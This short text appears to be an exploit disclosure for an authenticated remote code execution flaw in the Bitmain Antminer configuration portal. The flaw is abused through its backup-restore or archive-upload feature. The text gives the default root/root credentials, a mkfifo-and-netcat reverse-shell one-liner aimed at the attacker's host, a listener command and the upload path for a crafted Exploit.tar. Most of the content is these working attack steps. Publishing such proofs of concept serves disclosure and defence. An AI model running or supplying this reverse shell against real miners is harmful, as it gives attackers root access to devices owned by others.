The software used by the miners produced by the bitmain (AntMiner) is affected by a vulnerability of remote code execution type, it is possible through the “Retore Backup” functionality of the administration portal to execute commands on the system. This would allow a malicious user with valid credentials to access the entire file system with administrative privileges.
Login on Antminer Configuration Portal (Default Credential: root/root)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port
>/tmp/f
Exploit.tar
nc -vv -l -p port
system –> upgrade –> upload archive